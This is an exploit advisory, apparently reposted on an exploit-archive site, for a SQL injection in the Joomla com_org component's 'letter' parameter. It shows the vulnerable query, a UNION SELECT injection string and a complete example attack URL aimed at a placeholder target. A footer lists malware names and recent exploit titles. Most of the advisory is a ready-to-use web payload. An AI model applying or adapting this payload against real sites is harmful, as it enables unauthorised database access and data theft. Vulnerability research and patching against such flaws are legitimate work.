Joomla com_org SQL Injection Vulnerability (letter parameter

Posted on 15 March 2010

=============================================================
Joomla com_org SQL Injection Vulnerability (letter parameter)
=============================================================

# Joomla com_org SQL Injection Vulnerability (letter parameter)
# Author: kazuya
# Mail: kazuy0r@gmail.com Jabber: kazuya@jabber.ccc.de
# Greetz to back2hack

# Vulnerability
# Query: SELECT count(*) FROM `jos_org` WHERE (`name` LIKE '<sql>%' || ...
# SQL: ')+union+select+0,0,0,1,0,2,0,0,0,0,0,0,0,0,0,0,0--+f
# Example: http://[target].com/index.php?option=com_org&letter=')+union+select+0,0,0,1,0,2,0,0,0,0,0,0,0,0,0,0,0--+f&task=indexs


# ~  - [ [ : Inj3ct0r : ] ]

TOP

Malware :

HermeticWiper
Virus:Win32/Sality.AM!corrupt
Virus:HTML/Sapaq.A
Virus:Win32/Parite.B.dll
Virus:Win32/Virut.AE

Last 20

Exploits :

Customer Support System 1.0 Cross Site Scripting
Xhibiter NFT Marketplace 1.10.2 SQL Injection
WordPress WPCode Lite 2.1.14 Cross Site Scripting
Azon Dominator Affiliate Marketing Script SQL Injection
Simple Laboratory Management System 1.0 SQL Injection

Last 20